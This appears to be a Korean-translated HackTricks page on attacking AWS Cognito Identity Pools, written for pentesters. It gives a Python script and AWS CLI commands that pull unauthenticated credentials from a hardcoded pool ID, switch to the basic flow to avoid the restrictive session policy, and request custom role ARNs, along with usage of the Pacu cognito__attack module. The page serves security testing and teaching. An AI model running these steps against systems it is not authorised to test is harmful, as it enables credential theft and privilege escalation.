Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

아이덴티티 풀은 사용자가 임시 자격 증명을 획득할 수 있도록 하여 중요한 역할을 합니다. 이러한 자격 증명은 Amazon S3 및 DynamoDB를 포함한 다양한 AWS 서비스에 접근하는 데 필수적입니다. 아이덴티티 풀의 주목할 만한 기능은 익명 게스트 사용자와 사용자 인증을 위한 다양한 아이덴티티 제공자를 지원한다는 것입니다. 지원되는 아이덴티티 제공자는 다음과 같습니다:

Amazon Cognito 사용자 풀
Facebook, Google, Amazon으로 로그인, Apple로 로그인과 같은 소셜 로그인 옵션
OpenID Connect (OIDC) 준수 제공자
SAML (Security Assertion Markup Language) 아이덴티티 제공자
개발자 인증 아이덴티티

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Identity Pool 세션을 생성하려면 먼저 Identity ID를 생성해야 합니다. 이 Identity ID는 해당 사용자의 세션 식별자입니다. 이러한 식별자는 최대 20개의 데이터 세트를 가질 수 있으며, 각 데이터 세트는 최대 1MB의 키-값 쌍을 저장할 수 있습니다.

이는 사용자의 정보를 유지하는 데 유용합니다 (항상 동일한 Identity ID를 사용하는 사용자).

게다가, 서비스 cognito-sync는 이 정보를 관리하고 동기화할 수 있는 서비스입니다 (데이터 세트에서, 스트림 및 SNS 메시지로 정보를 전송하는 등).

Tools for pentesting

Pacu, AWS 취약점 탐지 프레임워크는 이제 "cognito__enum" 및 "cognito__attack" 모듈을 포함하여 계정의 모든 Cognito 자산을 자동으로 열거하고 약한 구성, 접근 제어에 사용되는 사용자 속성 등을 플래그하며, 사용자 생성(여기에는 MFA 지원 포함) 및 수정 가능한 사용자 정의 속성, 사용 가능한 Identity Pool 자격 증명, ID 토큰에서 가정 가능한 역할 등을 기반으로 한 권한 상승을 자동화합니다.

모듈 기능에 대한 설명은 블로그 게시물 2부를 참조하십시오. 설치 지침은 주요 Pacu 페이지를 참조하십시오.

Usage

주어진 Identity Pool 및 사용자 풀 클라이언트에 대해 사용자 생성 및 모든 권한 상승 벡터를 시도하는 샘플 cognito__attack 사용법:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

샘플 cognito__enum 사용법으로 현재 AWS 계정에서 볼 수 있는 모든 사용자 풀, 사용자 풀 클라이언트, 아이덴티티 풀, 사용자 등을 수집합니다:

Pacu (new:test) > run cognito__enum

Cognito Scanner는 원치 않는 계정 생성 및 아이덴티티 풀 상승을 포함하여 Cognito에 대한 다양한 공격을 구현하는 파이썬 CLI 도구입니다.

설치

$ pip install cognito-scanner

사용법

$ cognito-scanner --help

더 많은 정보는 https://github.com/padok-team/cognito-scanner 를 확인하세요.

IAM 역할 접근

인증되지 않음

공격자가 인증되지 않은 사용자로서 Cognito 앱에서 AWS 자격 증명을 얻기 위해 알아야 할 유일한 것은 Identity Pool ID이며, 이 ID는 웹/모바일 애플리케이션에 하드코딩되어 있어야 사용될 수 있습니다. ID는 다음과 같이 보입니다: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (무작위 대입 공격이 불가능합니다).

기본적으로 IAM Cognito 인증되지 않은 역할은 Cognito_<Identity Pool name>Unauth_Role로 호출됩니다.

하드코딩된 Identity Pools ID를 찾고 인증되지 않은 사용자를 허용하는 경우, 다음을 사용하여 AWS 자격 증명을 얻을 수 있습니다:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

또는 다음 aws cli 명령어를 사용할 수 있습니다:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

기본적으로 인증되지 않은 cognito 사용자는 정책을 통해 할당되었더라도 어떤 권한도 가질 수 없습니다. 다음 섹션을 확인하세요.

향상된 인증 흐름 vs 기본 인증 흐름

이전 섹션은 기본 향상된 인증 흐름을 따랐습니다. 이 흐름은 생성된 IAM 역할 세션에 제한적인 세션 정책을 설정합니다. 이 정책은 세션이 이 목록의 서비스만 사용하도록 허용합니다 (역할이 다른 서비스에 접근할 수 있더라도).

그러나 Identity pool에 "기본 (클래식) 흐름"이 활성화되어 있으면, 사용자는 해당 흐름을 사용하여 세션을 얻을 수 있으며, 이 세션은 제한적인 세션 정책이 없습니다.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

이 오류가 발생하면, 기본 흐름이 활성화되지 않았기 때문입니다 (기본값)

An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.

IAM 자격 증명이 있는 경우 어떤 접근 권한이 있는지 확인하고 권한 상승을 시도해야 합니다.

인증된 사용자

인증된 사용자는 아마도 다른 권한이 부여될 것이므로, 앱 내에서 가입할 수 있다면, 그렇게 시도하여 새로운 자격 증명을 얻으세요.

Identity Pool에 접근하는 인증된 사용자를 위한 역할이 있을 수 있습니다.

이를 위해 아이덴티티 제공자에 접근해야 할 수도 있습니다. 만약 그것이 Cognito 사용자 풀이라면, 기본 동작을 악용하여 새 사용자를 직접 생성할 수 있을지도 모릅니다.

IAM Cognito 인증 역할은 기본적으로 Cognito_<Identity Pool name>Auth_Role로 생성됩니다.

어쨌든, 다음 예제는 Identity Pool에 접근하기 위해 사용되는 Cognito 사용자 풀에 이미 로그인했다고 가정합니다 (다른 유형의 아이덴티티 제공자도 구성될 수 있다는 점을 잊지 마세요).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# 이전 명령 응답에서 identity_id 가져오기
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# IdToken에서 사용자가 User Pool 그룹으로 접근할 수 있는 역할을 찾을 수 있습니다
# --custom-role-arn을 사용하여 특정 역할에 대한 자격 증명을 가져옵니다
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

사용자가 로그인하는 아이덴티티 제공자에 따라 다른 IAM 역할을 구성할 수 있습니다 또는 사용자에 따라 (클레임을 사용하여) 다를 수 있습니다. 따라서 동일한 또는 다른 제공자를 통해 다양한 사용자에 접근할 수 있다면, 모든 사용자의 IAM 역할에 로그인하고 접근하는 것이 가치가 있을 수 있습니다.

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 계획 확인하기!
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 Twitter 🐦 @hacktricks_live**를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 1 month ago